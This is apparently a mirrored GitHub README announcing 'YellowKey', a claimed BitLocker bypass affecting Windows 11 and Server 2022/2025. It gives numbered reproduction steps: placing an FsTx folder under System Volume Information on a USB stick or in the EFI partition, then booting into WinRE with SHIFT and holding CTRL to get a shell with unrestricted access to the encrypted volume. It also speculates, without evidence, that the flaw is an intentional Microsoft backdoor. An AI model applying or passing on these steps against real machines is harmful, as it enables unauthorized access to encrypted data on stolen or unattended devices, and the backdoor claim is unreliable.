mirror of
https://github.com/Nightmare-Eclipse/YellowKey.git
synced 2026-05-16 10:40:10 +00:00
121 lines
2.5 KiB
Markdown
121 lines
2.5 KiB
Markdown
# YellowKey
|
|
### YellowKey Bitlocker Bypass Vulnerability
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Been a while since I saw a BitLocker bypass around, my turn.
|
|
|
|
This is one of the most insane discoveries I ever found, almost feels like a **backdoor** but what do you know, maybe I'm just insane.
|
|
|
|
---
|
|
|
|
# Affected Systems
|
|
|
|
- Windows 11
|
|
- Windows Server 2022
|
|
- Windows Server 2025
|
|
|
|
Windows 10 does **NOT** appear to be affected.
|
|
|
|
---
|
|
|
|
# How To Reproduce
|
|
|
|
## 1. Copy FsTx
|
|
|
|
Copy the `FsTx` folder to:
|
|
|
|
```text
|
|
YourUSBStick:\System Volume Information\FsTx
|
|
```
|
|
|
|
Use a Windows-compatible filesystem:
|
|
|
|
- NTFS (recommended)
|
|
- FAT32
|
|
- exFAT
|
|
|
|
Funny thing is, the vulnerability is extremely convenient, you don't even need an external storage device.
|
|
|
|
You can literally:
|
|
|
|
- Pull the disk out
|
|
- Copy the files into the EFI partition
|
|
- Put the disk back
|
|
|
|
…and it will still work.
|
|
|
|
That's how bad it is.
|
|
|
|
---
|
|
|
|
## 2. Plug The USB Device
|
|
|
|
Insert the USB stick into the target Windows machine with BitLocker enabled.
|
|
|
|
---
|
|
|
|
## 3. Reboot Into WinRE
|
|
|
|
Hold `SHIFT` and click the Restart button using your mouse.
|
|
|
|
This boots the system into Windows Recovery Environment.
|
|
|
|
---
|
|
|
|
## 4. Trigger The Vulnerability
|
|
|
|
Once you click restart:
|
|
|
|
- Release `SHIFT`
|
|
- Hold `CTRL`
|
|
- DO NOT release it
|
|
|
|
---
|
|
|
|
## 5. Enjoy The Shell
|
|
|
|
If everything was done correctly, a shell will spawn with unrestricted access to the BitLocker protected volume.
|
|
|
|
---
|
|
|
|
# Demonstration
|
|
|
|
<img width="1370" height="777" alt="shell" src="https://github.com/user-attachments/assets/eda6c823-4a6b-4aec-bad2-b9afad640dd6" />
|
|
|
|
---
|
|
|
|
# Why Does This Feel Like A Backdoor?
|
|
|
|
The component responsible for this bug:
|
|
|
|
- Is not present anywhere publicly
|
|
- Does not appear on the internet
|
|
- Exists only inside the WinRE image
|
|
|
|
What makes this even more suspicious is that the exact same component also exists in normal Windows installations with the exact same name — except without the functionality that triggers the BitLocker bypass.
|
|
|
|
Why?
|
|
|
|
I genuinely can't come up with an explanation besides the possibility that this behavior was intentional.
|
|
|
|
Even stranger:
|
|
|
|
- Only Windows 11 is affected
|
|
- Server 2022/2025 are affected
|
|
- Windows 10 is completely unaffected
|
|
|
|
---
|
|
|
|
# Special Thanks
|
|
|
|
Huge thanks to:
|
|
|
|
- MORSE
|
|
- MSTIC
|
|
- Microsoft GHOST
|
|
|
|
For making this public disclosure possible ;)
|